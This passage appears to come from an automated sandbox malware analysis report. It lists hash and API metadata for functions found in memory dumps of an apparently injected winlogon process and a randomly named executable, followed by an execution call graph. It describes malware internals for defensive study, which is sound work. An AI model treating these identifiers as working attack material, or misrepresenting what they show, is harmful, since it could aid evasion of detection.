                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 5377c2d080006a4fe2cd119959f91c4f1597db279fc077c9b970d2bb0f292206
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: E101296D325F6492FB649BAAE80C71A73A0BB49B87F148464CE4A07765EF3DC158C704
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction ID: 599e737887705c3809ce4680662d838ae3905f4783b37dc68dc1ccc8eae22418
                                                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction Fuzzy Hash: 78519F3A701A20AAEB14DFA9E84CB5937A6F344BCAF30C524DA568778DDB75DD42C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction ID: b166926d79cf74f009588074e3820990c0fc1e07a97fa4e01069ba2e3ee14553
                                                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction Fuzzy Hash: 6651BF3A75DA20EAEB14DF99E84CB5937AAF344B8AF10C5A4DA174778CDB35C842C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: 2a81db31a951e5e259a4acc7b5a595b85a3b479c602b75ed73f30d03813019d1
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: BBF06866304E51A2EB60CFE9F9C87597762F748B8AF94C020DB4946654DF3CC64DCB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: e535c0649dfb5c656df934673802aa2881829a80634b4f76755b7f08d64bed47
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 69F04466718E51A2E7608BE9F9887596761F748BC9F94C020DB4A46654DF3CC68DCB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: fb1c96070f1bbd8c52466b515c03c742fb3955bbc3562a61c2f5362b02f3ede6
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 5BF05828204FA4A2EA588FDBB9081197262AB48FC2F08E030EF4A47B18DF38C445C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 859cf1714d0438efb9fd229f799e05916821dabd80631214c70755d8405ab38f
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 21F09679311F15A1FB148BEDE84C3596361EB84767F548219CB6A452F4DF3CC444C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 05bf48fb40d5b317a8235632c964cef6d02a25c8f7691d3038dd68194b884147
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 51F08C28328FA4A2FA448FDBB90C1196260AB48FD2F18E170EF4A07B58DF3CC485C700
                                                        • Instruction ID: 6d7b5b403a3188d3b4841f9fb94707250acf1a7d2d8579f267c512fad794f412
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 7391D67AB20E70A5F766DFAD94883AD3BA0F754B8AF24C109DE0A57795DB34C486C700
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 6c068aa945f0ac6dafb2ede45e1116f91dfe096492dd73cd30e6c0fcb5e07c68
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: A7111226710F1599EF00CFA8E8593A833A4F75975EF441E25DB6D867A4DF78C1A8C380
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 5f5e41b068d0f293cc7ef7899fb07c4c471cec35d55f3e32321b6d3ba8d92876
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: 0971FB3A280FA166D726DFADD8483AA6794F385B86F648025DD0ED3B89DE35C645C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 898a99a824d3708835f2c6571b9ade3bad5d2cda467ec0446c5c9970c4b06ed6
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: 6471F63A20CFA166E7269FED98483EA7794F389B86F648066DD0B53B89DE35C541C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 1c103488b81b5755e9a858689f9c8f9220dbcbf2f2fcf3c8ea21b2028d61d58d
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: C5619D3B602F549AEB20CFA9D44439D7BA0F748B8EF148215EF4917B99DB38D156C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 9fd3008523d1d31d7ee32bda0e514125121f93270c61e4c83d0e3fe2aa1cbd72
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 4B61AB3B600F949AEB20DFA9D44439D77A0F748B8DF148A15EF4917B99DB38D496C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: a83db0d25de40b44f666c5a5d64bcfc4ffcb5cd7079b315c16954b0aa5d8d6a1
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 0F516B3A284FA1A5F63ADFADE09C3BAA751F785B41F648125CE4D83B49CE39C544C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 46897ffc2cc2630562e995aa3ab88a20c60a5fe9943d3a7bd5f75d2a5dc7dda7
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 8051273A60CFA1A1E6799FEDE05C37A7B51F784B41F648165CE4B03B49CA39C544C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 2b7cbdf29e740ea36268c330b496c3bcbbcaca586992bcfa57e7be5236719281
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: F0412A76314F90A2EB21DFA9E8483A977A1F398796F508021EE4D87794EF3CC445C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: ff598f2dff618ae855125180d135eff0feb50115b417593be16094bb43c2f728
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: BC41C476325E90A6DB21CFA9E8483AE77A0F798795F508021EE4E87794EB7CC445C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: c91e1e86bab824f286d7942031cacff95a827eda15b7eec0a60a9f277f66f1ea
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 54112B3A218F9092EB65CB59E44435977E5FB88B99F688220EF8C47768DF3CC552CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 8e6f9ddc8bd4a0050d82363797f3a651ef4e3f91162d625b6a7f86f7e5c4113b
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: CF115B36218F9092EB608B59E40435977E4FB88B99F288260EF8D47B68DF3CC552CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 40d697394cd767119a46280874914b4daa5d8e9346db535fcc515f98333aa0ca
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 7EE08661A41F84A0DF118F66E8442D873A0DB58B69B48D122995C46311FA38D1E9C300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 3bdf3a98a46eddaab18917913d4673d13906e839a3b4fd0dcf7fe39589f613a6
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: B2E08661640F84A0EF018F65E8442D833A0DB5CB65B49D122995C06351FA38D1E9C301
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 33387b3a89b0f7cf97b4c9f63ea1e6ce0b438a2dcf969175634c70bf0c094b31
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: F9E0CD61A01F44D0DF118F65D4441D87360E75CB69F88D222CD4C47311FB38D1E5C300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 5795fbfa8a47514ff8c6ddda118d1662a7868f1be9d24305db9b02968eedc405
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 28E08661640F8490EF018F65D4401987360EB5CB55B88D122C95C06351FA38D1E5C301
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 1420031e885aaf21fcc6fdccc82258bc3790c71e1673b6532d453dab14891ff2
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: 95115129601F64E2EA54DFAEA44C22977A5FB89FC2F188025DE4E97765DF38C442C300
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 435233d5cd765dd7833698f1ddb9f59ae8d1156237805913c2fcddc5f4e0a6b6
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: B2119129615F5492EB54DFAEA80C26973A1FB89FC2F188065DE4E53765DF38C442C300
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 5f6bbecbb8621be69b39046fe70b37093b4047639506c31062e86b7116282652
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 3EE03239A01E1486EB088BAAD80834A36E2EB89B07F08C0248A0907361DF7DC499CB90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 46137aeb2ac080d4014b8e101a3abee4704eba82c5d2520b876412a79b8151bf
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 77E06D39621E1486EB548FEAD80C36A36E1FB89F06F14C024CA0907751DF7DC499C750
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1885163966.00007FF67BA51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF67BA50000, based on PE: true
                                                        • Associated: 00000019.00000002.1885071807.00007FF67BA50000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000019.00000002.1885260809.00007FF67BA5B000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000019.00000002.1885382420.00007FF67BA5F000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000019.00000002.1893002919.00007FF67BCE2000.00000008.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000019.00000002.1893730831.00007FF67BF58000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000019.00000002.1893787160.00007FF67BF90000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000019.00000002.1893823832.00007FF67BF93000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_7ff67ba50000_wepulfrfkvoz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                                                        • Instruction ID: 585d77443b7e26a89f5b82c9ab1aea43b041ab92620849b898c4551422317c25
                                                        • Opcode Fuzzy Hash: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                                                        • Instruction Fuzzy Hash: 28B0923292430984E2003F11D8812692260AF0C741F800021E50C42366CE6D51804B24

                                                        Execution Graph

                                                        Execution Coverage:1%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:261
                                                        Total number of Limit Nodes:15
                                                        execution_graph 14836 202c0ab273c 14839 202c0ab276a 14836->14839 14837 202c0ab28d4 14838 202c0ab2858 LoadLibraryA 14838->14839 14839->14837 14839->14838 14840 202c0ae202c 14841 202c0ae205d 14840->14841 14842 202c0ae2173 14841->14842 14849 202c0ae2081 14841->14849 14853 202c0ae213e 14841->14853 14843 202c0ae2178 14842->14843 14844 202c0ae21e7 14842->14844 14861 202c0ae2f04 GetProcessHeap HeapAlloc 14843->14861 14845 202c0ae21ec 14844->14845 14844->14853 14848 202c0ae2f04 11 API calls 14845->14848 14847 202c0ae20b9 StrCmpNIW 14847->14849 14851 202c0ae2190 14848->14851 14849->14847 14852 202c0ae20e0 14849->14852 14849->14853 14851->14853 14852->14849 14854 202c0ae1bf4 14852->14854 14855 202c0ae1c8f 14854->14855 14856 202c0ae1c1b GetProcessHeap HeapAlloc 14854->14856 14855->14852 14856->14855 14857 202c0ae1c56 14856->14857 14858 202c0ae1c77 GetProcessHeap HeapFree 14857->14858 14867 202c0ae152c 14857->14867 14858->14855 14866 202c0ae2f57 14861->14866 14862 202c0ae3015 GetProcessHeap HeapFree 14862->14851 14863 202c0ae3010 14863->14862 14864 202c0ae2fa2 StrCmpNIW 14864->14866 14865 202c0ae1bf4 6 API calls 14865->14866 14866->14862 14866->14863 14866->14864 14866->14865 14868 202c0ae1546 14867->14868 14871 202c0ae157c 14867->14871 14869 202c0ae155d StrCmpIW 14868->14869 14870 202c0ae1565 StrCmpW 14868->14870 14868->14871 14869->14868 14870->14868 14871->14858 14872 202c0ae1abc 14877 202c0ae1628 GetProcessHeap HeapAlloc 14872->14877 14874 202c0ae1ad2 Sleep SleepEx 14875 202c0ae1acb 14874->14875 14875->14874 14876 202c0ae1598 StrCmpIW StrCmpW 14875->14876 14876->14875 14921 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14877->14921 14879 202c0ae1650 14922 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14879->14922 14881 202c0ae1661 14923 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14881->14923 14883 202c0ae166a 14924 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap 
